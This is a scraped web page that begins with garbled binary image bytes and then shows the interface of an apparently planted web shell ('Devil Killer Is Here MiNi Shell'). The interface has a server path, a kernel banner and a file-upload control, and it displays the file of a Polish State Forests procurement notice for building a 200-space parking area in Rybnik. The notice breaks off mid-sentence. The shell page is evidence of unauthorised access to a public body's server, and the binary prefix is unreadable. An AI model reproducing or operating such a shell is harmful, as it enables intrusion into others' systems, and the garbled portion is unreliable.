JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230926/0041466701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> BUDOWA MIEJSCA POSTOJU POJAZDÓW W LEŚNICTWIE ZACISZE ODDZ. 15-b </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWE GOSPODARSTWO LEŚNE &#34;LASY PAŃSTWOWE&#34; NADLEŚNICTWO RYBNIK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272536161</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 32 422 37 48</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rybnik@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rybnik.katowice.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> BUDOWA MIEJSCA POSTOJU POJAZDÓW W LEŚNICTWIE ZACISZE ODDZ. 15-b </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bf1927fd-5c80-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00414667</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.rybnik.katowice.lasy.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.josephine.proebiz.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności <br/>składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji <br/>odbywa się elektronicznie za pośrednictwem dedykowanego formularza <br/>dostępnego na platformie JOSEPHINE https://josephine.proebiz.com/pl/ oraz <br/>poczty elektronicznej z zastrzeżeniem, że złożenie oferty następuje wyłącznie <br/>przy użyciu platformy JOSEPHINE https://josephine.proebiz.com/pl/. We<br/>wszelkiej korespondencji Zamawiający i Wykonawcy posługują się numerem <br/>postępowania wskazanym w SWZ. <br/>2. Zamawiający będzie również komunikować się z Wykonawcami za pomocą <br/>poczty elektronicznej, email rybnik@katowice.lasy.gov.pl.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów <br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji <br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z <br/>platformy Josephine https://josephine.proebiz.com/pl/ stanowiącym załącznik nr <br/>9 do SWZ.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem platformy Josephine <br/>https://josephine.proebiz.com/pl/ wynosi 500 mb.<br/>5. Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie <br/>Josephine https://josephine.proebiz.com/pl/ Za datę przekazania wniosków, <br/>zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych <br/>kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich <br/>przekazania na adres poczty elektronicznej Zamawiającego wskazany w pkt 8.10 <br/>pkt. b) SWZ lub złożenia na platformie Josephine https://josephine.proebiz.com.<br/>6. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzeniem Prezesa Rady Ministrów z <br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania <br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz <br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. 2020 poz. 2452 ze zm.) określa niezbędne <br/>wymagania techniczne umożliwiające pracę na platformie Josephine <br/>https://josephine.proebiz.com/pl/ tj.<br/>- Podłączenie do internetu; <br/>- Zainstalowana jedna z następujących przeglądarek internetowych: Microsoft <br/>Internet Explorer wersja 11.0 lub wyższa, Mozilla Firefox wersja 13.0 lub wyższa <br/>lub Google Chrome; <br/>7. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub <br/>oświadczeń składane są przez Wykonawcę za pośrednictwem poczty <br/>elektronicznej, na wskazany w pkt 2 adres email. <br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub <br/>oświadczeń składane są przez Wykonawcę za pośrednictwem platformy <br/>JOSEPHINE https://josephine.proebiz.com/pl/ jako załączniki.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub <br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgody z <br/>wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 <br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz <br/>wymagań technicznych dla dokumentów elektronicznych oraz środków <br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego <br/>lub konkursie (Dz.U. 2020 poz. 2452 ze zm.) oraz Rozporządzenie Ministra <br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych <br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może <br/>żądać zamawiający od wykonawcy (Dz.U. 2020 poz. 2415 ze zm.) z późn.zm.).<br/>Sposób sporządzenia i przekazywania informacji oraz wymagań technicznych <br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej musi <br/>być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady <br/>Ministrów z dnia 31.12.2020 r. w sprawie sposobu sporządzania i przekazywania <br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz <br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia <br/>publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452 ze zm.).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Dotyczy w szczególności:<br/>- wykonawcy będącego osobą fizyczną,<br/>- wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność <br/>gospodarczą,<br/>- pełnomocnika wykonawcy będącego osobą fizyczną (np. dane osobowe <br/>zamieszczone w pełnomocnictwie),<br/>- członka organu zarządzającego wykonawcy, będącego osobą fizyczną (np. dane <br/>osobowe zamieszczone w informacji z KRK),<br/>-osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o <br/>udzielenie zamówienia publicznego.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich <br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie <br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1. administratorem danych osobowych jest Zamawiający tj. Nadleśnictwo Rybnik z <br/>siedzibą 44-200 Rybnik, ul. Kościuszki 36, tel. 32/ 422-37-48, który posiada <br/>inspektora ochrony danych osobowych. W sprawach związanych z ochroną <br/>danych osobowych proszę kontaktować się z Inspektorem Ochrony Danych.<br/>2. dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/>związanym z postępowaniem o udzielenie tegoż zamówienia publicznego <br/>prowadzonym w trybie podstawowym<br/>3. odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona <br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 72 ustawy z <br/>dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r. poz. <br/>1605 z póź.zm.), dalej „ustawa PZP”. <br/>4. dane osobowe będą przechowywane, zgodnie z powszechnie obowiązującymi <br/>przepisami prawa oraz wewnętrzną instrukcja kancelaryjną Zamawiającego.<br/>5. obowiązek podania danych osób fizycznych bezpośrednio dotyczących tegoż <br/>zamówienia jest wymogiem ustawowym określonym w przepisach ustawy PZP, <br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/>konsekwencje niepodania określonych danych wynikają z ustawy PZP.<br/>6. w odniesieniu do danych osobowych osób fizycznych, decyzje nie będą <br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>7. Osoby fizyczne posiadają:<br/>a) na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych <br/>dotyczących,<br/>b) na podstawie art. 16 RODO prawo do sprostowania danych osobowych,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których <br/>mowa w art. 18 ust. 2 RODO, <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/>gdy uzna, że przetwarzanie danych osobowych dotyczących narusza przepisy <br/>RODO,<br/>8. Osobie fizycznej nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych <br/>osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. <br/>6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.6.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej zgodnie z <br/>wymaganiami zawartymi w programie funkcjonalno-użytkowym oraz pozyskanie <br/>wszelkich niezbędnych dokumentów koniecznych do uzyskania pozwolenia na <br/>budowę lub prawomocnego zgłoszenia robót inwestycji pn.: &#34;Budowa miejsca <br/>postoju pojazdów w Leśnictwie Zacisze, oddz. 15-b” oraz pełnienie nadzoru <br/>autorskiego w toku realizacji budowy. Wykonanie robót obejmujących wykonanie<br/>200 stanowisk postojowych o wymiarach 2,30m x 5,00m wraz z drogą <br/>manewrową. Zakłada się zabudowę warstwy konstrukcyjnej podbudowy z <br/>kruszywa sortowanego gr. minimum 20 cm oraz warstwę nawierzchni gr. min. 5 <br/>cm z kruszywa sortowanego, na wyprofilowanym podłożu doprowadzonym do <br/>nośności G1. Pobocze wokół miejsca postoju pojazdów należy wyprofilować z <br/>materiału pozyskanego z korytowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca zobowiązany jest podać na formularzu oferty (załącznik nr 1 do <br/>SWZ) łączną cenę za wykonanie całego przedmiotu zamówienia.<br/>2. Cena oferty musi być podana w PLN cyfrowo i słownie, w wartości netto i brutto, <br/>z wyodrębnieniem należnego podatku VAT. Cena może być tylko jedna.<br/>3. Cena oferty jest ceną ryczałtową.<br/>4. Kosztorys ofertowy (dostarczony Zamawiającemu przed podpisaniem umowy) <br/>należy sporządzić metodą kalkulacji uproszczonej<br/>5. Metoda kalkulacji uproszczonej polega na obliczeniu ceny kosztorysowej jako <br/>sumy iloczynów ustalonych jednostek przedmiarowych i ich cen jednostkowych, z <br/>uwzględnieniem podatku od towarów i usług (VAT) – według formuły:<br/>Ck = L x Cj + PV<br/>Ck oznacza cenę kosztorysową, <br/>L oznacza liczby ustalonych jednostek przedmiarowych, <br/>Cj oznacza ceny jednostkowe dla ustalonych jednostek przedmiarowych, <br/>PV oznacza podatek od towarów i usług (VAT).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O zamówienie mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania na podstawie:<br/>a) art. 108 ust. 1 ustawy PZP oraz art. 7 ust. 1 o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących <br/>ochronie bezpieczeństwa narodowego (Dz.U. 2022 poz. 835) (przesłanki <br/>obligatoryjne wykluczenia),<br/>b) art. 109 ust.1 pkt. 1 – 10 ustawy PZP (fakultatywne przesłanki <br/>wykluczenia), tj. Zamawiający wykluczy Wykonawcę:<br/>- który naruszył obowiązki dotyczące płatności podatków, opłat lub składek na <br/>ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadku, o którym <br/>mowa w art. 108 ust. 1 pkt 3, chyba że wykonawca odpowiednio przed <br/>upływem terminu do składania wniosków o dopuszczenie do udziału w <br/>postępowaniu albo przed upływem terminu składania ofert dokonał płatności <br/>należnych podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie <br/>w sprawie spłaty tych należności;<br/>- który naruszył obowiązki w dziedzinie ochrony środowiska, prawa socjalnego <br/>lub prawa pracy:<br/> będącego osobą fizyczną skazanego prawomocnie za przestępstwo <br/>przeciwko środowisku, o którym mowa w rozdziale XXII Kodeksu <br/>karnego lub za przestępstwo przeciwko prawom osób wykonujących <br/>pracę zarobkową, o którym mowa w rozdziale XXVIII Kodeksu <br/>karnego, lub za odpowiedni czyn zabroniony określony w przepisach <br/>prawa obcego,<br/> będącego osobą fizyczną prawomocnie ukaranego za wykroczenie <br/>przeciwko prawom pracownika lub wykroczenie przeciwko <br/>środowisku, jeżeli za jego popełnienie wymierzono karę aresztu, <br/>ograniczenia wolności lub karę grzywny,<br/> wobec którego wydano ostateczną decyzję administracyjną o <br/>naruszeniu obowiązków wynikających z prawa ochrony środowiska, <br/>prawa pracy lub przepisów o zabezpieczeniu społecznym, jeżeli <br/>wymierzono tą decyzją karę pieniężną;<br/>- jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, <br/>wspólnika spółki w spółce jawnej lub partnerskiej albo komplementariusza w <br/>spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie <br/>skazano za przestępstwo lub ukarano za wykroczenie, o którym mowa w pkt 2 <br/>lit. a lub b;<br/>- w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego <br/>aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego <br/>działalność gospodarcza jest zawieszona albo znajduje się on w innej tego <br/>rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach <br/>miejsca wszczęcia tej procedury;<br/>- który w sposób zawiniony poważnie naruszył obowiązki zawodowe, co <br/>podważa jego uczciwość, w szczególności gdy wykonawca w wyniku <br/>zamierzonego działania lub rażącego niedbalstwa nie wykonał lub <br/>nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za <br/>pomocą stosownych dowodów;<br/>- jeżeli występuje konflikt interesów w rozumieniu art. 56 ust. 2, którego nie <br/>można skutecznie wyeliminować w inny sposób niż przez wykluczenie <br/>wykonawcy;<br/>- który, z przyczyn leżących po jego stronie, w znacznym stopniu lub zakresie <br/>nie wykonał lub nienależycie wykonał albo długotrwale nienależycie <br/>wykonywał istotne zobowiązanie wynikające z wcześniejszej umowy w <br/>sprawie zamówienia publicznego lub umowy koncesji, co doprowadziło do <br/>wypowiedzenia lub odstąpienia od umowy, odszkodowania, wykonania <br/>zastępczego lub realizacji uprawnień z tytułu rękojmi za wady;<br/>- który w wyniku zamierzonego działania lub rażącego niedbalstwa wprowadził <br/>zamawiającego w błąd przy przedstawianiu informacji, że nie podlega <br/>wykluczeniu, spełnia warunki udziału w postępowaniu lub kryteria selekcji, co <br/>mogło mieć istotny wpływ na decyzje podejmowane przez zamawiającego w <br/>postępowaniu o udzielenie zamówienia, lub który zataił te informacje lub nie <br/>jest w stanie przedstawić wymaganych podmiotowych środków dowodowych;<br/>- który bezprawnie wpływał lub próbował wpływać na czynności <br/>zamawiającego lub próbował pozyskać lub pozyskał informacje poufne, <br/>mogące dać mu przewagę w postępowaniu o udzielenie zamówienia;<br/>- który w wyniku lekkomyślności lub niedbalstwa przedstawił informacje <br/>wprowadzające w błąd, co mogło mieć istotny wpływ na decyzje <br/>podejmowane przez zamawiającego w postępowaniu o udzielenie <br/>zamówienia.<br/>2) na podstawie art. 112 ust. 2 pkt 4 spełniają warunki udziału dotyczące <br/>zdolności technicznej lub zawodowej. Wykonawca spełni ten warunek, jeżeli <br/>wykaże, że<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli <br/>okres prowadzenia działalności jest krótszy w tym okresie, zrealizował jedną<br/>robotę budowlaną odpowiadającą swoim rodzajem robotom budowlanym <br/>stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 100 